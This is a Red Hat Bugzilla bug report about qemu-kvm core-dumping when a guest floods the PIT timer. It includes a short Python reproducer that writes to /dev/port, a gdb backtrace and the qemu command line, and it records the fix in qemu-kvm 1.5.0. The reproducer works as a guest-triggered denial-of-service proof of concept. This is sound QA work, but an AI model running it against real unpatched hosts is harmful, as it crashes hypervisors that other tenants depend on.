Bug 954306

Summary: rhel7 guest core dumped when DDOS by high frequency of pit timer
Product: Red Hat Enterprise Linux 7 Reporter: ShupingCui <scui>
Component: qemu-kvmAssignee: Marcelo Tosatti <mtosatti>
Status: CLOSED CURRENTRELEASE QA Contact: Virtualization Bugs <virt-bugs>
Severity: high Docs Contact:
Priority: medium    
Version: 7.0CC: acathrow, hhuang, juzhang, knoel, mazhang, michen, mrezanin, virt-maint
Target Milestone: rc   
Target Release: ---   
Hardware: Unspecified   
OS: Unspecified   
Whiteboard:
Fixed In Version: qemu-kvm-1.5.0-1.el7 Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2014-06-13 11:09:29 UTC Type: Bug
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Attachments:
Description Flags
gdb info none

Comment 1 ShupingCui 2013-04-22 08:30:49 UTC 
Created attachment 738456 [details]
gdb info
Comment 3 Hai Huang 2013-04-22 14:05:35 UTC 
Please feel free to reassign this BZ as appropriate.  Thanks.
Comment 4 Miroslav Rezanina 2013-05-24 06:19:04 UTC 
Build in qemu-kvm-1.5.0-1.el7
Comment 5 mazhang 2014-01-03 08:11:27 UTC 
Reproduced this bug.

Host:
qemu-kvm-1.4.0-4.el7.x86_64
kernel-3.10.0-64.el7.x86_64

Guest:
RHEL7-64

Cli:
gdb --args /usr/libexec/qemu-kvm \
-M pc \
-cpu Opteron_G1 \
-m 8G \
-smp 4,sockets=2,cores=2,threads=1,maxcpus=16 \
-enable-kvm \
-name rhel7-64 \
-uuid 990ea161-6b67-47b2-b803-19fb01d30d12 \
-smbios type=1,manufacturer='Red Hat',product='RHEV Hypervisor',version=el6,serial=koTUXQrb,uuid=feebc8fd-f8b0-4e75-abc3-e63fcdb67170 \
-k en-us \
-rtc base=localtime,clock=host,driftfix=slew \
-nodefaults \
-monitor stdio \
-qmp tcp:0:6666,server,nowait \
-boot menu=on \
-bios /usr/share/seabios/bios.bin \
-vga qxl \
-spice port=5900,disable-ticketing \
-chardev socket,id=seabioslog,path=/tmp/seabios,server,nowait \
-device isa-debugcon,chardev=seabioslog,iobase=0x402 \
-monitor unix:/tmp/guest-sock,server,nowait \
-drive file=/home/rhel7-64.raw,if=none,id=drive-ide0-0-1,format=raw,cache=none,aio=threads \
-device ide-drive,bus=ide.1,unit=0,drive=drive-ide0-0-1,id=ide0-0-1,bootindex=0 \
-netdev tap,id=hostnet0,vhost=on \
-device virtio-net-pci,netdev=hostnet0,id=net0,mac=52:54:00:39:13:2c \
-device virtio-balloon-pci,id=balloon0 \

Steps:
Execute the following python script in guest:
import struct
f = file("/dev/port","rw+")

def outb(port, data):
    f.seek(port)
    f.write(struct.pack("B", data))

outb(0x43, 0x34)
outb(0x40, 0x1)
outb(0x40, 0x0)

Result:
qemu-kvm core dumped.

(gdb) bt
#0  0x0000000000000000 in ?? ()
#1  0x0000555555769f8c in memory_region_read_accessor (opaque=0x5555564daf68, addr=<optimized out>, 
    value=0x7fffea7bab60, size=1, shift=0, mask=255) at /usr/src/debug/qemu-1.4.0/memory.c:316
#2  0x00005555557698f2 in access_with_adjusted_size (addr=addr@entry=0, value=value@entry=0x7fffea7bab60, size=1, 
    access_size_min=<optimized out>, access_size_max=<optimized out>, 
    access=access@entry=0x555555769f40 <memory_region_read_accessor>, opaque=opaque@entry=0x5555564daf68)
    at /usr/src/debug/qemu-1.4.0/memory.c:364
#3  0x000055555576aef8 in memory_region_iorange_read (iorange=0x5555564db2d0, offset=0, width=1, data=0x7fffea7bab60)
    at /usr/src/debug/qemu-1.4.0/memory.c:409
#4  0x0000555555764ee7 in ioport_readb_thunk (opaque=<optimized out>, addr=<optimized out>)
    at /usr/src/debug/qemu-1.4.0/ioport.c:186
#5  0x00005555557657b1 in ioport_read (address=126, index=0) at /usr/src/debug/qemu-1.4.0/ioport.c:70
#6  cpu_inb (addr=addr@entry=126) at /usr/src/debug/qemu-1.4.0/ioport.c:309
#7  0x0000555555767b7b in kvm_handle_io (count=1, size=1, direction=0, data=<optimized out>, port=126)
    at /usr/src/debug/qemu-1.4.0/kvm-all.c:1414
#8  kvm_cpu_exec (env=env@entry=0x55555650cde0) at /usr/src/debug/qemu-1.4.0/kvm-all.c:1581
#9  0x0000555555714741 in qemu_kvm_cpu_thread_fn (arg=0x55555650cde0) at /usr/src/debug/qemu-1.4.0/cpus.c:759
#10 0x00007ffff625cde3 in start_thread () from /lib64/libpthread.so.0
#11 0x00007ffff3bf526d in clone () from /lib64/libc.so.6
Comment 7 Marcelo Tosatti 2014-01-03 13:40:34 UTC 
Should be fixed qemu-kvm-1.5.3-21.el7(In reply to mazhang from comment #5)
> Reproduced this bug.
> 
> Host:
> qemu-kvm-1.4.0-4.el7.x86_64
> kernel-3.10.0-64.el7.x86_64

Please attempt to use 

qemu-kvm-1.5.0-1.el7

or newer.

> 
> Guest:
> RHEL7-64
> 
> Cli:
> gdb --args /usr/libexec/qemu-kvm \
> -M pc \
> -cpu Opteron_G1 \
> -m 8G \
> -smp 4,sockets=2,cores=2,threads=1,maxcpus=16 \
> -enable-kvm \
> -name rhel7-64 \
> -uuid 990ea161-6b67-47b2-b803-19fb01d30d12 \
> -smbios type=1,manufacturer='Red Hat',product='RHEV
> Hypervisor',version=el6,serial=koTUXQrb,uuid=feebc8fd-f8b0-4e75-abc3-
> e63fcdb67170 \
> -k en-us \
> -rtc base=localtime,clock=host,driftfix=slew \
> -nodefaults \
> -monitor stdio \
> -qmp tcp:0:6666,server,nowait \
> -boot menu=on \
> -bios /usr/share/seabios/bios.bin \
> -vga qxl \
> -spice port=5900,disable-ticketing \
> -chardev socket,id=seabioslog,path=/tmp/seabios,server,nowait \
> -device isa-debugcon,chardev=seabioslog,iobase=0x402 \
> -monitor unix:/tmp/guest-sock,server,nowait \
> -drive
> file=/home/rhel7-64.raw,if=none,id=drive-ide0-0-1,format=raw,cache=none,
> aio=threads \
> -device
> ide-drive,bus=ide.1,unit=0,drive=drive-ide0-0-1,id=ide0-0-1,bootindex=0 \
> -netdev tap,id=hostnet0,vhost=on \
> -device virtio-net-pci,netdev=hostnet0,id=net0,mac=52:54:00:39:13:2c \
> -device virtio-balloon-pci,id=balloon0 \
> 
> Steps:
> Execute the following python script in guest:
> import struct
> f = file("/dev/port","rw+")
> 
> def outb(port, data):
>     f.seek(port)
>     f.write(struct.pack("B", data))
> 
> outb(0x43, 0x34)
> outb(0x40, 0x1)
> outb(0x40, 0x0)
> 
> Result:
> qemu-kvm core dumped.
> 
> (gdb) bt
> #0  0x0000000000000000 in ?? ()
> #1  0x0000555555769f8c in memory_region_read_accessor
> (opaque=0x5555564daf68, addr=<optimized out>, 
>     value=0x7fffea7bab60, size=1, shift=0, mask=255) at
> /usr/src/debug/qemu-1.4.0/memory.c:316
> #2  0x00005555557698f2 in access_with_adjusted_size (addr=addr@entry=0,
> value=value@entry=0x7fffea7bab60, size=1, 
>     access_size_min=<optimized out>, access_size_max=<optimized out>, 
>     access=access@entry=0x555555769f40 <memory_region_read_accessor>,
> opaque=opaque@entry=0x5555564daf68)
>     at /usr/src/debug/qemu-1.4.0/memory.c:364
> #3  0x000055555576aef8 in memory_region_iorange_read
> (iorange=0x5555564db2d0, offset=0, width=1, data=0x7fffea7bab60)
>     at /usr/src/debug/qemu-1.4.0/memory.c:409
> #4  0x0000555555764ee7 in ioport_readb_thunk (opaque=<optimized out>,
> addr=<optimized out>)
>     at /usr/src/debug/qemu-1.4.0/ioport.c:186
> #5  0x00005555557657b1 in ioport_read (address=126, index=0) at
> /usr/src/debug/qemu-1.4.0/ioport.c:70
> #6  cpu_inb (addr=addr@entry=126) at /usr/src/debug/qemu-1.4.0/ioport.c:309
> #7  0x0000555555767b7b in kvm_handle_io (count=1, size=1, direction=0,
> data=<optimized out>, port=126)
>     at /usr/src/debug/qemu-1.4.0/kvm-all.c:1414
> #8  kvm_cpu_exec (env=env@entry=0x55555650cde0) at
> /usr/src/debug/qemu-1.4.0/kvm-all.c:1581
> #9  0x0000555555714741 in qemu_kvm_cpu_thread_fn (arg=0x55555650cde0) at
> /usr/src/debug/qemu-1.4.0/cpus.c:759
> #10 0x00007ffff625cde3 in start_thread () from /lib64/libpthread.so.0
> #11 0x00007ffff3bf526d in clone () from /lib64/libc.so.6
Comment 10 mazhang 2014-01-06 03:10:12 UTC 
Update host kernel package to comment 9 provide and re-test it, host will not kernel panic.
Comment 15 Ludek Smid 2014-06-13 11:09:29 UTC 
This request was resolved in Red Hat Enterprise Linux 7.0.

Contact your manager or support representative in case you have further questions about the request.